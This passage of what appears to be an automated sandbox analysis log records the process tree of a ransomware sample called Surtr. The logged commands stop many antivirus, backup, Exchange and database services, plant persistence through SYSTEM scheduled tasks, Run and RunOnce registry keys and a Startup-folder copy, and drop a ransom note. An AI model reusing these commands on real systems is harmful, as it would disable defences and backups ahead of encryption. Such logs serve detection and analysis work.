      C:\Windows\system32\net1 stop "McShield"
      4⤵
      PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:220
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfemms"
  2⤵
  PID:236
- - C:\Windows\system32\net.exe
    net stop "mfemms"
    3⤵
    PID:3160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfemms"
      4⤵
      PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfevtp"
  2⤵
  PID:3124
- - C:\Windows\system32\net.exe
    net stop "mfevtp"
    3⤵
    PID:2648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfevtp"
      4⤵
      PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MMS"
  2⤵
  PID:2192
- - C:\Windows\system32\net.exe
    net stop "MMS"
    3⤵
    PID:548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MMS"
      4⤵
      PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
  2⤵
  PID:2072
- - C:\Windows\system32\net.exe
    net stop "mozyprobackup"
    3⤵
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mozyprobackup"
      4⤵
      PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
  2⤵
  PID:2188
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer"
    3⤵
    PID:2692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer"
      4⤵
      PID:2180
    - - C:\Windows\system32\net.exe
        
        net stop "VeeamDeploySvc"
        5⤵
        
        PID:2692
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        6⤵
        
        PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
  2⤵
  PID:2800
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer100"
    3⤵
    PID:1556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer100"
      4⤵
      PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
  2⤵
  PID:2684
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer110"
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:1156
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:2552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
  2⤵
  PID:2052
- - C:\Windows\system32\net.exe
    net stop "MSExchangeES"
    3⤵
    PID:2068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeES"
      4⤵
      PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:1048
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
  2⤵
  PID:3248
- - C:\Windows\system32\net.exe
    net stop "MSExchangeIS"
    3⤵
    PID:1208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeIS"
      4⤵
      PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
  2⤵
  PID:2372
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMGMT"
    3⤵
    PID:2760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMGMT"
      4⤵
      PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
  2⤵
  PID:1516
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMTA"
    3⤵
    PID:1072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMTA"
      4⤵
      PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"
  2⤵
  PID:1256
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSA"
    3⤵
    PID:672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSA"
      4⤵
      PID:2480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:2968
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"
  2⤵
  PID:2512
- - C:\Windows\system32\net.exe
    net stop "MSExchangeSRS"
    3⤵
    PID:2796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeSRS"
      4⤵
      PID:3252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"
  2⤵
  PID:2812
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SQL_2008"
    3⤵
    PID:1440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SQL_2008"
      4⤵
      PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"
  2⤵
  PID:3260
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$SYSTEM_BGC"
    3⤵
    PID:3268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"
      4⤵
      PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"
  2⤵
  PID:2332
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPS"
    3⤵
    PID:2152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPS"
      4⤵
      PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"
  2⤵
  PID:468
- - C:\Windows\system32\net.exe
    net stop "MSOLAP$TPSAMA"
    3⤵
    PID:3312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSOLAP$TPSAMA"
      4⤵
      PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:2624
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:628
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:2724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"
  2⤵
  PID:1400
- - C:\Windows\system32\net.exe
    net stop "MSSQL$BKUPEXEC"
    3⤵
    PID:1648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"
      4⤵
      PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1244
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"
  2⤵
  PID:2456
- - C:\Windows\system32\net.exe
    net stop "MSSQL$ECWDB2"
    3⤵
    PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"
  2⤵
  PID:1476
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PRACTTICEBGC"
    3⤵
    PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"
  2⤵
  PID:1536
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROFXENGAGEMENT"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
      4⤵
      PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"
  2⤵
  PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"
  2⤵
  PID:2168
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SBSMONITORING"
    3⤵
    PID:1328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
      4⤵
      PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"
  2⤵
  PID:3164
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SHAREPOINT"
    3⤵
    PID:3340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"
      4⤵
      PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"
  2⤵
  PID:1132
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQL_2008"
    3⤵
    PID:3108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
      4⤵
      PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"
  2⤵
  PID:780
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SYSTEM_BGC"
    3⤵
    PID:3352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"
  2⤵
  PID:3316
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPS"
    3⤵
    PID:1352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPS"
      4⤵
      PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"
  2⤵
  PID:3400
- - C:\Windows\system32\net.exe
    net stop "MSSQL$TPSAMA"
    3⤵
    PID:1832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
      4⤵
      PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:2788
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
  2⤵
  PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
  2⤵
  PID:2584
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher"
    3⤵
    PID:3408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher"
      4⤵
      PID:2132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
  2⤵
  PID:2128
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:2708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
  2⤵
  PID:2444
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:1640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
  2⤵
  PID:2448
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:3392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
  2⤵
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
  2⤵
  PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
  2⤵
  PID:3432
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:3412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
  2⤵
  PID:3472
- - C:\Windows\system32\net.exe
    net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:3456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
  2⤵
  PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
  2⤵
  PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
  2⤵
  PID:3496
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerOLAPService"
    3⤵
    PID:3520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL80"
  2⤵
  PID:3576
- - C:\Windows\system32\net.exe
    net stop "MySQL80"
    3⤵
    PID:3584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL80"
      4⤵
      PID:3568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL57"
  2⤵
  PID:3548
- - C:\Windows\system32\net.exe
    net stop "MySQL57"
    3⤵
    PID:3560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL57"
      4⤵
      PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
  2⤵
  PID:3592
- - C:\Windows\system32\net.exe
    net stop "OracleClientCache80"
    3⤵
    PID:3644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "OracleClientCache80"
      4⤵
      PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
  2⤵
  PID:3636
- - C:\Windows\system32\net.exe
    net stop "PDVFSService"
    3⤵
    PID:3616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "PDVFSService"
      4⤵
      PID:3600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
  2⤵
  PID:3668
- - C:\Windows\system32\net.exe
    net stop "POP3Svc"
    3⤵
    PID:3652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "POP3Svc"
      4⤵
      PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer"
  2⤵
  PID:3676
- - C:\Windows\system32\net.exe
    net stop "ReportServer"
    3⤵
    PID:3660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer"
      4⤵
      PID:3700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
  2⤵
  PID:3692
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SQL_2008"
    3⤵
    PID:3732
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
      4⤵
      PID:3724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
  2⤵
  PID:3740
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:3708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
  2⤵
  PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
  2⤵
  PID:3772
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPSAMA"
    3⤵
    PID:3748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
      4⤵
      PID:3796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "RESvc"
  2⤵
  PID:3780
- - C:\Windows\system32\net.exe
    net stop "RESvc"
    3⤵
    PID:3828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "RESvc"
      4⤵
      PID:3820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sacsvr"
  2⤵
  PID:3804
- - C:\Windows\system32\net.exe
    net stop "sacsvr"
    3⤵
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SamSs"
  2⤵
  PID:3860
- - C:\Windows\system32\net.exe
    net stop "SamSs"
    3⤵
    PID:3852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SamSs"
      4⤵
      PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
  2⤵
  PID:3892
- - C:\Windows\system32\net.exe
    net stop "SAVAdminService"
    3⤵
    PID:3888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVAdminService"
      4⤵
      PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVService"
  2⤵
  PID:3844
- - C:\Windows\system32\net.exe
    net stop "SAVService"
    3⤵
    PID:3908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVService"
      4⤵
      PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Smcinst"
  2⤵
  PID:3948
- - C:\Windows\system32\net.exe
    net stop "Smcinst"
    3⤵
    PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SmcService"
  2⤵
  PID:3924
- - C:\Windows\system32\net.exe
    net stop "SmcService"
    3⤵
    PID:3916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SmcService"
      4⤵
      PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
  2⤵
  PID:3988
- - C:\Windows\system32\net.exe
    net stop "SMTPSvc"
    3⤵
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SMTPSvc"
      4⤵
      PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SNAC"
  2⤵
  PID:3964
- - C:\Windows\system32\net.exe
    net stop "SNAC"
    3⤵
    PID:4012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SNAC"
      4⤵
      PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SntpService"
  2⤵
  PID:4036
- - C:\Windows\system32\net.exe
    net stop "SntpService"
    3⤵
    PID:4020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SntpService"
      4⤵
      PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sophossps"
  2⤵
  PID:4028
- - C:\Windows\system32\net.exe
    net stop "sophossps"
    3⤵
    PID:4004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sophossps"
      4⤵
      PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
  2⤵
  PID:4068
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:4060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
  2⤵
  PID:4052
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$ECWDB2"
    3⤵
    PID:2964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
      4⤵
      PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
  2⤵
  PID:2360
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:4092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
  2⤵
  PID:2432
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:2472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:2412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
  2⤵
  PID:2428
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:3092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:2864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
  2⤵
  PID:3104
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:2668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:2948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
  2⤵
  PID:2144
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:2936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
  2⤵
  PID:1940
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQL_2008"
    3⤵
    PID:2328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
      4⤵
      PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
  2⤵
  PID:2352
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:2420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
  2⤵
  PID:2212
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPS"
    3⤵
    PID:2148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPS"
      4⤵
      PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
  2⤵
  PID:2228
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPSAMA"
    3⤵
    PID:1616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
      4⤵
      PID:964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:2244
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
  2⤵
  PID:2008
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:1144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
  2⤵
  PID:1952
- - C:\Windows\system32\net.exe
    net stop "SQLBrowser"
    3⤵
    PID:1100
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLBrowser"
      4⤵
      PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
  2⤵
  PID:2908
- - C:\Windows\system32\net.exe
    net stop "SQLSafeOLRService"
    3⤵
    PID:308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSafeOLRService"
      4⤵
      PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
  2⤵
  PID:2160
- - C:\Windows\system32\net.exe
    net stop "SQLSERVERAGENT"
    3⤵
    PID:828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSERVERAGENT"
      4⤵
      PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
  2⤵
  PID:2528
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY"
    3⤵
    PID:2516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY"
      4⤵
      PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
  2⤵
  PID:2816
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:2888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
  2⤵
  PID:2612
- - C:\Windows\system32\net.exe
    net stop "SQLWriter"
    3⤵
    PID:3200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLWriter"
      4⤵
      PID:3212
- C:\Windows\system32\cmd.exe
